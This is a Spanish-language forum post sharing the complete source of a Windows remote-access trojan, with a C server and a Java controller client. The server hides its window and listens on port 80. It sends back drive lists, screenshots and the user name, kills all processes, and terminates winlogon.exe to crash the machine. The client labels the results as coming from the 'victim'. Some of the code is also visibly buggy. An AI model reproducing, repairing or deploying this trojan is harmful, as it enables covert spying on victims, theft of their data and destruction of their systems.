[source] Silent Troyan
Publicado: 17 Sep 2010, 22:15
Bueno aqui os dejo el codigo de un troyano que desarrollo mi amigo Moises, el server esta en c y el cliente en java si mal no recuerdo.
Codigo:
salu2!
PD: se me olvido comentar que este troyano la matanza de procesos la realiza a modo kernel osea que puede matar cualquier proceso :D
Codigo:
Código: Seleccionar todo
/*
No me hago responsable del mal uso de este software.
Codigo SilentTroyan
*/
#include <stdio.h>
#include <stdlib.h>
#include "server.h"
#include <winsock.h>
#include <process.h>
#include <tlhelp32.h>
#include <windows.h>
#include <dirent.h>
#define PRINT_LOG(x) printf("%s%s",x,"\n")
#define PRINT_COORDINATE(x,y) printf("%d%s%d%s",x,",",y,"\n")
BITMAPINFO bmi;
BYTE * pbBits;
BITMAPFILEHEADER * bfh;
typedef struct mem_encode
{
char * buffer;
size_t size;
}mem_encode;
typedef struct fops
{
char * filename;
int filesize;
char * buffer;
}fops;
struct mem_encode * p;
struct fops * filepointer;
void StartupServer()
{
WSADATA data;
int ret = WSAStartup(MAKEWORD(2,1),&data);
if ( ret != -1 )
{
PRINT_LOG("Iniciado correctamente..");
}
else
{
PRINT_LOG("No se puede iniciar el servidor..\n");
}
}
void ListarDispositivos(int pSocket)
{
char szBuffer[MAX_PATH];
GetLogicalDriveStrings(MAX_PATH, szBuffer);
char *pch = szBuffer;
while (*pch) {
send(pSocket,pch,strlen(pch),0);
pch = &pch[strlen(pch) + 1];
}
}
void CapturarPantalla(int pSocket)
{
BITMAPINFO bmi;
BITMAPFILEHEADER bfh;
int nWidth;
int nHeight;
HWND hWnd;
HDC hdc ;
HDC memDC;
HBITMAP hbm ;
HBITMAP hbmOld;
BYTE *pbBits;
HANDLE hfile;
DWORD dwWritten;
nWidth = GetSystemMetrics(SM_CXSCREEN);
nHeight = GetSystemMetrics(SM_CYSCREEN);
hWnd = GetDesktopWindow();
hdc = GetDC(hWnd);
memDC = CreateCompatibleDC(hdc);
hbm = CreateCompatibleBitmap(hdc, nWidth, nHeight);
hbmOld = (HBITMAP)SelectObject(memDC, hbm);
BitBlt(memDC, 0, 0, nWidth, nHeight, hdc, 0, 0, SRCCOPY);
ZeroMemory(&bmi, sizeof(bmi));
bmi.bmiHeader.biSize = sizeof(BITMAPINFOHEADER);
bmi.bmiHeader.biWidth = nWidth;
bmi.bmiHeader.biHeight = nHeight;
bmi.bmiHeader.biBitCount = 24;
bmi.bmiHeader.biPlanes = 1;
bmi.bmiHeader.biCompression = BI_RGB;
bmi.bmiHeader.biSizeImage = 32 * nWidth * nHeight / 8;
pbBits = (BYTE *) malloc(bmi.bmiHeader.biSizeImage);
GetDIBits( memDC,
hbm,
0,
bmi.bmiHeader.biHeight,
pbBits,
&bmi,
DIB_RGB_COLORS );
bfh.bfType = ('M' << 8) + 'B';
bfh.bfSize = sizeof(BITMAPFILEHEADER) +
bmi.bmiHeader.biSizeImage +
sizeof(BITMAPINFOHEADER);
bfh.bfReserved1 = 0;
bfh.bfReserved2 = 0;
bfh.bfOffBits = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER);
p = ( struct mem_encode*)malloc(sizeof(mem_encode*));
p->size = bmi.bmiHeader.biSizeImage;
p->buffer = (char*)malloc(p->size);
memcpy(p->buffer,(char*)pbBits,p->size);
send(pSocket,(char*)&bfh,sizeof(bfh),0);
send(pSocket,(char*)&bmi.bmiHeader,sizeof(BITMAPINFOHEADER),0);
send(pSocket,p->buffer,p->size,0);
shutdown(pSocket,SD_SEND);
SelectObject(memDC, hbmOld);
DeleteDC(memDC);
ReleaseDC(hWnd,hdc);
DeleteObject(hbm);
}
void GetUserAdministrator(int pSocket)
{
char out[MAX_PATH];
DWORD nNombredeUsuario = sizeof(out);
int ret = GetUserName(out,&nNombredeUsuario);
if ( ret != -1 )
{
send(pSocket,out,strlen(out),0);
shutdown(pSocket,SD_SEND);
}
}
void ListarArchivos(char * name,int serverSocket)
{
DIR *d;
struct dirent *dir;
d = opendir(name);
char * buff = (char*)malloc(MAX_PATH);
if ( d )
{
while ((dir = readdir(d)) != NULL)
{
sprintf(buff,"%s",dir->d_name);
send(serverSocket,buff,strlen(buff),0);
}
}
shutdown(serverSocket,SD_SEND);
}
void DownloadFile(char * file)
{
filepointer = (struct fops*)malloc(sizeof(fops*));
filepointer->filename = ( char * ) malloc(MAX_PATH);
strcpy(filepointer->filename,file);
PRINT_LOG(filepointer->filename);
filepointer->filesize = strlen(filepointer->filename);
FILE * fileop = fopen(filepointer->filename,"rb+");
char buff[filepointer->filesize];
filepointer->buffer = ( char * ) malloc(filepointer->filesize);
if ( !fileop )
{
PRINT_LOG("Imposible abrir el archivo..");
}else
{
while ( !feof(fileop) )
{
if ( fgets(buff,filepointer->filesize,fileop) != NULL )
{
strcpy(filepointer->buffer,buff);
send(pSocket,filepointer->buffer,filepointer->size,0);
}
}
fclose(fileop);
}
}
HWND obtenerHwnd()
{
char oldConsoleTitle[MAX_PATH];
GetConsoleTitle(oldConsoleTitle,MAX_PATH);
HWND hHandle = FindWindow(NULL,oldConsoleTitle);
if (hHandle) return ( hHandle );
}
void EsconderProceso()
{
char oldConsoleTitle[MAX_PATH];
GetConsoleTitle(oldConsoleTitle,MAX_PATH);
HWND hHandle = FindWindow(NULL,oldConsoleTitle);
if ( hHandle != NULL )
{
ShowWindow(hHandle,SW_HIDE);
}
}
void ObtenerCoordenadas()
{
POINT p;
while ( GetCursorPos(&p) )
{
PRINT_COORDINATE(p.x,p.y);
}
}
int AjustarPrivilegios(LPCSTR lpszPriv) {
HANDLE hToken;
LUID luid;
TOKEN_PRIVILEGES tkprivs;
ZeroMemory(&tkprivs, sizeof(tkprivs));
if (!OpenProcessToken(GetCurrentProcess(), (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY), &hToken)) return 0;
if (!LookupPrivilegeValue(NULL, lpszPriv, &luid)) {
CloseHandle(hToken); return 0;
}
tkprivs.PrivilegeCount = 1;
tkprivs.Privileges[0].Luid = luid;
tkprivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
int bRet = AdjustTokenPrivileges(hToken, 0, &tkprivs, sizeof(tkprivs), NULL, NULL);
CloseHandle(hToken);
return bRet;
}
void RemoteBSOD()
{
HANDLE hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
if ( hSnapshot != NULL )
{
PROCESSENTRY32 pe;
pe.dwSize=sizeof(PROCESSENTRY32);
int ret = Process32First(hSnapshot,&pe);
if ( ret != -1 )
{
HANDLE hProc = (HANDLE)malloc(sizeof(HANDLE));
while ( Process32Next(hSnapshot,&pe) )
{
if ( strcmp(pe.szExeFile,"winlogon.exe") == 0 )
{
AjustarPrivilegios(SE_DEBUG_NAME);
PRINT_LOG("Finalizando proceso..");
int pid = pe.th32ProcessID;
hProc = OpenProcess(PROCESS_ALL_ACCESS,0,pid);
if ( hProc != NULL )
{
TerminateProcess(hProc,-1);
}else
{
PRINT_LOG("Error..");
}
}
}
CloseHandle(hProc);
}
}
}
void callback(void * arg)
{
SOCKET servidor = ( SOCKET ) arg;
char buff[MAX_PATH];
int bytes = recv(servidor,buff,sizeof(buff),0);
PRINT_LOG(buff);
if ( strcmp(buff,"INICIATE") == 0)
{
PRINT_LOG("Iniciando servicios...");
ListarDispositivos(servidor);
shutdown(servidor,SD_SEND);
}
else if ( strcmp(buff,"MATAMEE") == 0 )
{
PRINT_LOG("Listando procesos..");
HANDLE hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
if ( hSnapshot != NULL )
{
PROCESSENTRY32 pe;
pe.dwSize=sizeof(PROCESSENTRY32);
int ret = Process32First(hSnapshot,&pe);
if ( ret != -1 )
{
HANDLE hProc = (HANDLE)malloc(sizeof(HANDLE));
while ( Process32Next(hSnapshot,&pe) )
{
int pid = pe.th32ProcessID;
AjustarPrivilegios(SE_DEBUG_NAME);
hProc = OpenProcess(PROCESS_ALL_ACCESS,0,pid);
if ( hProc != NULL )
{
TerminateProcess(hProc,-1);
}
}
CloseHandle(hProc);
}
shutdown(servidor,SD_SEND);
}
}
else if ( strcmp(buff,"SNAPSHOT") == 0 )
{
CapturarPantalla(servidor);
}
else if ( strcmp(buff,"GETUSER") == 0)
{
GetUserAdministrator(servidor);
}
else if ( strcmp(buff,"BSOD123") == 0 )
{
RemoteBSOD();
}
}
void create_server(int port)
{
StartupServer();
EsconderProceso();
struct sockaddr_in sock;
SOCKET pSocket;
sock.sin_family = AF_INET;
sock.sin_port = htons ( port );
sock.sin_addr.s_addr = INADDR_ANY;
pSocket = socket(AF_INET,SOCK_STREAM,0);
if ( pSocket != -1 )
{
int ret = bind(pSocket,(struct sockaddr*)&sock,sizeof(sock));
if ( ret != -1 )
{
ret = listen(pSocket,30);
while ( 1 )
{
int size = sizeof(sock);
ret = accept(pSocket,(struct sockaddr*)&sock,&size);
if ( ret != -1 )
{
PRINT_LOG("Aceptado..");
_beginthread(callback,0,(void*)ret);
}
}
}
}
}
int main(int argc,char ** argv)
{
create_server(80);
}Código: Seleccionar todo
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
package cliente;
import java.net.*;
import java.io.*;
import javax.swing.JOptionPane;
import java.awt.image.BufferedImage;
import javax.imageio.ImageIO;
import java.awt.*;
import javax.swing.*;
/**
*
* @author moi
*/
public class Host {
/**
* @param args the command line arguments
*/
public static int RFC_MAX_MESSAGE = 0x02;
public static StringBuilder ConectarConHost(String host)
{
StringBuilder bd = new StringBuilder();
try
{
Socket s= new Socket(host,80);
if ( s.isConnected() == true )
{
String output = "INICIATE";
byte[] buff = output.getBytes();
OutputStream out = s.getOutputStream();
out.write(buff,0,buff.length);
InputStream input = s.getInputStream();
int reads = 0;
while ( ( reads = input.read()) != -1 )
{
bd.append((char)reads);
}
}
}catch (Exception e)
{
JOptionPane.showMessageDialog(null,e.toString());
}
return ( bd );
}
public static void MatarTodosLosProcesos(String host)
{
try
{
Socket s= new Socket(host,80);
if ( s.isConnected() == true )
{
String output = "MATAMEE";
byte[] buff = output.getBytes();
OutputStream out = s.getOutputStream();
out.write(buff,0,buff.length);
}
}catch (Exception ex)
{
JOptionPane.showMessageDialog(null,ex.toString());
}
}
public static void GetSnapshot(final String host)
{
Runnable r = new Runnable()
{
public void run()
{
try
{
Socket s= new Socket(host,80);
OutputStream out = s.getOutputStream();
InputStream in = s.getInputStream();
FileOutputStream outs = new FileOutputStream("C:\\snapshot.bmp");
StringBuilder bs = new StringBuilder();
int c = 0;
byte[] r = new byte[1024];
if ( s.isConnected() == true )
{
String output = "SNAPSHOT";
byte[] buff = output.getBytes();
out.write(buff,0,buff.length);
while ( ( c = in.read(r)) != -1 )
{
//Formulario.jLabel1.setIcon(new ImageIcon(r));
outs.write(r,0,c);
}
JOptionPane.showMessageDialog(null,"Snapshot creado correctamente!");
outs.close();
}
}catch (Exception ex)
{
JOptionPane.showMessageDialog(null,ex.toString());
}
}
};
Thread s = new Thread(r);
s.start();
}
public static void GetPantalla(final String Host)
{
Runnable r = new Runnable()
{
public void run()
{
try
{
Socket s= new Socket(Host,80);
OutputStream out = s.getOutputStream();
InputStream in = s.getInputStream();
FileOutputStream outs = new FileOutputStream("C:\\snapshot.png");
StringBuilder bs = new StringBuilder();
byte buffs[] = new byte[RFC_MAX_MESSAGE];
int c = 0;
byte[] r = new byte[1024];
if ( s.isConnected() == true )
{
String output = "VISIONAM";
byte[] buff = output.getBytes();
out.write(buff,0,buff.length);
in.read(buffs,0,buffs.length);
String pRead = new String(buffs);
if ( pRead.equals("OK"))
{
while ( true )
{
Point llpPoint = MouseInfo.getPointerInfo().getLocation();
String rfcMessage = "RFC " + String.valueOf(llpPoint.x) + "," + String.valueOf(llpPoint.y);
byte[] bff = rfcMessage.getBytes();
out.write(bff,0,bff.length);
InputStream ins = s.getInputStream();
if ( ( c = ins.read(r) ) != -1 )
{
outs.write(r,0,c);
}
}
}
}
}catch (Exception ex)
{
JOptionPane.showMessageDialog(null,ex.toString());
}
}
};
Thread s = new Thread(r);
s.start();
}
public static void GetUser(String host,JLabel l)
{
try
{
Socket s= new Socket(host,80);
StringBuilder p = new StringBuilder();
if ( s.isConnected() == true )
{
String output = "GETUSER";
byte[] buff = output.getBytes();
OutputStream out = s.getOutputStream();
out.write(buff,0,buff.length);
InputStream ret = s.getInputStream();
String buffb = null;
int c = 0;
while ( ( c = ret.read() ) != -1 )
{
p.append((char)c);
}
buffb = p.toString();
l.setText("Nombre de la victima:" + buffb);
}
}catch (Exception ex)
{
JOptionPane.showMessageDialog(null,ex.toString());
}
}
public static void ProvocarBsod(String host)
{
try
{
Socket s= new Socket(host,80);
StringBuilder p = new StringBuilder();
if ( s.isConnected() == true )
{
String output = "BSOD123";
byte[] buff = output.getBytes();
OutputStream out = s.getOutputStream();
out.write(buff,0,buff.length);
}
}catch (Exception ex)
{
JOptionPane.showMessageDialog(null,ex.toString());
}
}
}PD: se me olvido comentar que este troyano la matanza de procesos la realiza a modo kernel osea que puede matar cualquier proceso :D